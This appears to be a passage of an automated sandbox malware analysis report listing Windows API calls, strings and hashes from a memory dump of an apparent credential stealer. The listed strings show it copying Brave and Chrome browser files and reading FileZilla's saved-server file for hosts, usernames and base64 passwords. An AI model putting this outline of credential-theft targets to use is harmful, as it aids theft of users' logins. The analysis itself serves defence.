                          • lstrlen.KERNEL32(010DCD40), ref: 0070E12E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E155
                          • lstrcat.KERNEL32(00000000,?), ref: 0070E15D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E19F
                          • lstrcat.KERNEL32(00000000), ref: 0070E1A9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E1D0
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0070E1F9
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070E22F
                          • lstrlen.KERNEL32(010D89A0), ref: 0070E23D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E261
                          • lstrcat.KERNEL32(00000000,010D89A0), ref: 0070E269
                          • lstrlen.KERNEL32(\Brave\Preferences), ref: 0070E274
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E29B
                          • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0070E2A7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E2CF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E30F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E349
                          • DeleteFileA.KERNEL32(?), ref: 0070E381
                          • StrCmpCA.SHLWAPI(?,010DCDA0), ref: 0070E3AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E3F4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E41C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E445
                          • StrCmpCA.SHLWAPI(?,010D8830), ref: 0070E468
                          • StrCmpCA.SHLWAPI(?,010D8B70), ref: 0070E47D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E4D9
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0070E4E0
                          • StrCmpCA.SHLWAPI(?,010DCD70), ref: 0070E58E
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070E5C4
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0070E639
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E678
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E6A1
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E6C7
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E70E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E737
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E75C
                          • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0070E776
                          • DeleteFileA.KERNEL32(?), ref: 0070E7D2
                          • StrCmpCA.SHLWAPI(?,010D89E0), ref: 0070E7FC
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E88C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E8B5
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E8EE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E916
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E952
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 2635522530-726946144
                          • Opcode ID: 83a87d8582eb21cce0002fc6928fd4c647fd783616970245499d2c3330d8d217
                          • Instruction ID: a3818bfdcb7cbc1715a5923ea24640c05dd63dfe5e418570d92afbe45091f2f4
                          • Opcode Fuzzy Hash: 83a87d8582eb21cce0002fc6928fd4c647fd783616970245499d2c3330d8d217
                          • Instruction Fuzzy Hash: 47925371A14216DBDB21EFB8DC8DAAE77F9AF44300F044624F845A7291DB78ED458F90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007118D2
                          • lstrlen.KERNEL32(\*.*), ref: 007118DD
                          • lstrcpy.KERNEL32(00000000,?), ref: 007118FF
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 0071190B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711932
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00711947
                          • StrCmpCA.SHLWAPI(?,007317A0), ref: 00711967
                          • StrCmpCA.SHLWAPI(?,007317A4), ref: 00711981
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007119BF
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007119F2
                          • lstrcpy.KERNEL32(00000000,?), ref: 00711A1A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00711A25
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711A4C
                          • lstrlen.KERNEL32(00731794), ref: 00711A5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711A80
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00711A8C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711AB4
                          • lstrlen.KERNEL32(?), ref: 00711AC8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711AE5
                          • lstrcat.KERNEL32(00000000,?), ref: 00711AF3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711B19
                          • lstrlen.KERNEL32(010D88C0), ref: 00711B2F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711B59
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00711B64
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711B8F
                          • lstrlen.KERNEL32(00731794), ref: 00711BA1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711BC3
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00711BCF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711BF8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711C25
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00711C30
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711C57
                          • lstrlen.KERNEL32(00731794), ref: 00711C69
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711C8B
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00711C97
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711CC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711CEF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00711CFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711D21
                          • lstrlen.KERNEL32(00731794), ref: 00711D33
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711D55
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00711D61
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711D8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711DB9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00711DC4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711DED
                          • lstrlen.KERNEL32(00731794), ref: 00711E19
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711E36
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00711E42
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711E68
                          • lstrlen.KERNEL32(010DCC50), ref: 00711E7E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711EB2
                          • lstrlen.KERNEL32(00731794), ref: 00711EC6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711EE3
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00711EEF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711F15
                          • lstrlen.KERNEL32(010DD4E8), ref: 00711F2B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711F5F
                          • lstrlen.KERNEL32(00731794), ref: 00711F73
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711F90
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00711F9C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711FC2
                          • lstrlen.KERNEL32(010CB248), ref: 00711FD8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00712000
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0071200B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00712036
                          • lstrlen.KERNEL32(00731794), ref: 00712048
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00712067
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00712073
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00712098
                          • lstrlen.KERNEL32(?), ref: 007120AC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007120D0
                          • lstrcat.KERNEL32(00000000,?), ref: 007120DE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00712103
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071213F
                          • lstrlen.KERNEL32(010DCD40), ref: 0071214E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00712176
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00712181
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                          • String ID: \*.*
                          • API String ID: 712834838-1173974218
                          • Opcode ID: 0e49b1759b5bacc297f113d484c0bf54e1e96523cdb6d84b7a6e73af77e5f1b0
                          • Instruction ID: 271d2336bed3127649df72dcd4be920ed3a675c60a1950adabeb05ea820e03a0
                          • Opcode Fuzzy Hash: 0e49b1759b5bacc297f113d484c0bf54e1e96523cdb6d84b7a6e73af77e5f1b0
                          • Instruction Fuzzy Hash: 9662B271A25616DBCB21AF68DC8CAEF77B9AF40700F444224F905A7292DB3CDD46DB90
                          APIs
                          • wsprintfA.USER32 ref: 0071392C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00713943
                          • StrCmpCA.SHLWAPI(?,007317A0), ref: 0071396C
                          • StrCmpCA.SHLWAPI(?,007317A4), ref: 00713986
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007139BF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007139E7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007139F2
                          • lstrlen.KERNEL32(00731794), ref: 007139FD
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713A1A
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00713A26
                          • lstrlen.KERNEL32(?), ref: 00713A33
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713A53
                          • lstrcat.KERNEL32(00000000,?), ref: 00713A61
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713A8A
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00713ACE
                          • lstrlen.KERNEL32(?), ref: 00713AD8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713B05
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00713B10
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713B36
                          • lstrlen.KERNEL32(00731794), ref: 00713B48
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713B6A
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00713B76
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713B9E
                          • lstrlen.KERNEL32(?), ref: 00713BB2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713BD2
                          • lstrcat.KERNEL32(00000000,?), ref: 00713BE0
                          • lstrlen.KERNEL32(010D89A0), ref: 00713C0B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713C31
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00713C3C
                          • lstrlen.KERNEL32(010D88C0), ref: 00713C5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713C84
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00713C8F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713CB7
                          • lstrlen.KERNEL32(00731794), ref: 00713CC9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713CE8
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00713CF4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713D1A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00713D47
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00713D52
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713D79
                          • lstrlen.KERNEL32(00731794), ref: 00713D8B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713DAD
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00713DB9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713DE2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713E11
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00713E1C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713E43
                          • lstrlen.KERNEL32(00731794), ref: 00713E55
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713E77
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00713E83
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713EAC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713EDB
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00713EE6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713F0D
                          • lstrlen.KERNEL32(00731794), ref: 00713F1F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713F41
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00713F4D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713F75
                          • lstrlen.KERNEL32(?), ref: 00713F89
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713FA9
                          • lstrcat.KERNEL32(00000000,?), ref: 00713FB7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713FE0
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071401F
                          • lstrlen.KERNEL32(010DCD40), ref: 0071402E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00714056
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00714061
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071408A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007140CE
                          • lstrcat.KERNEL32(00000000), ref: 007140DB
                          • FindNextFileA.KERNEL32(00000000,?), ref: 007142D9
                          • FindClose.KERNEL32(00000000), ref: 007142E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 1006159827-1013718255
                          • Opcode ID: 1b6fc118085c477aa08ea0719d40f2c083ec91aa4283cd35e0391d833c389c4f
                          • Instruction ID: 3d2cd1fc99a56fd901686f2ea4967f23ee9d22c62129639cc6f1f6bf6a6e2c07
                          • Opcode Fuzzy Hash: 1b6fc118085c477aa08ea0719d40f2c083ec91aa4283cd35e0391d833c389c4f
                          • Instruction Fuzzy Hash: 65625272A25616DBCB21AF68DC4DAEE77B9AF44700F044224F805A7291DB7CED46CF90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00716995
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 007169C8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716A02
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716A29
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00716A34
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716A5D
                          • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00716A77
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716A99
                          • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00716AA5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716AD0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716B00
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00716B35
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00716B9D
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00716BCD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 313953988-555421843
                          • Opcode ID: 046bcff23b65af9447e7033866daef3154e0d3f93f777a0395f32440f83c01ec
                          • Instruction ID: f1aad82061c48a7940ffde0aee762171267fd4443e1e81e722beb4b516485b24
                          • Opcode Fuzzy Hash: 046bcff23b65af9447e7033866daef3154e0d3f93f777a0395f32440f83c01ec
                          • Instruction Fuzzy Hash: 2242A571A29215EBCB11ABB8DC8DBAE77B9AF04700F044514F801E72D2DB7CD946DBA0
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070DBC1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DBE4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070DBEF
                          • lstrlen.KERNEL32(00734CA8), ref: 0070DBFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DC17
                          • lstrcat.KERNEL32(00000000,00734CA8), ref: 0070DC23
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DC4C
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070DC8F
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070DCBF
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0070DCD0
                          • StrCmpCA.SHLWAPI(?,007317A0), ref: 0070DCF0
                          • StrCmpCA.SHLWAPI(?,007317A4), ref: 0070DD0A
                          • lstrlen.KERNEL32(0072CFEC), ref: 0070DD1D
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070DD47
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DD70
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070DD7B
                          • lstrlen.KERNEL32(00731794), ref: 0070DD86
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DDA3
                          • lstrcat.KERNEL32(00000000,00731794), ref: 0070DDAF
                          • lstrlen.KERNEL32(?), ref: 0070DDBC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DDDF
                          • lstrcat.KERNEL32(00000000,?), ref: 0070DDED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DE19
                          • lstrlen.KERNEL32(00731794), ref: 0070DE3D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070DE6F
                          • lstrcat.KERNEL32(00000000,00731794), ref: 0070DE7B
                          • lstrlen.KERNEL32(010D8B70), ref: 0070DE8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DEB0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070DEBB
                          • lstrlen.KERNEL32(00731794), ref: 0070DEC6
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070DEE6
                          • lstrcat.KERNEL32(00000000,00731794), ref: 0070DEF2
                          • lstrlen.KERNEL32(010D8830), ref: 0070DF01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DF27
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070DF32
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DF5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DFA5
                          • lstrcat.KERNEL32(00000000,00731794), ref: 0070DFB1
                          • lstrlen.KERNEL32(010D8B70), ref: 0070DFC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DFE9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070DFF4
                          • lstrlen.KERNEL32(00731794), ref: 0070DFFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E022
                          • lstrcat.KERNEL32(00000000,00731794), ref: 0070E02E
                          • lstrlen.KERNEL32(010D8830), ref: 0070E03D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E063
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070E06E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E09A
                          • StrCmpCA.SHLWAPI(?,Brave), ref: 0070E0CD
                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 0070E0E7
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070E11F
                          • lstrlen.KERNEL32(010DCD40), ref: 0070E12E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E155
                          • lstrcat.KERNEL32(00000000,?), ref: 0070E15D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E19F
                          • lstrcat.KERNEL32(00000000), ref: 0070E1A9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E1D0
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0070E1F9
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070E22F
                          • lstrlen.KERNEL32(010D89A0), ref: 0070E23D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E261
                          • lstrcat.KERNEL32(00000000,010D89A0), ref: 0070E269
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0070E988
                          • FindClose.KERNEL32(00000000), ref: 0070E997
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
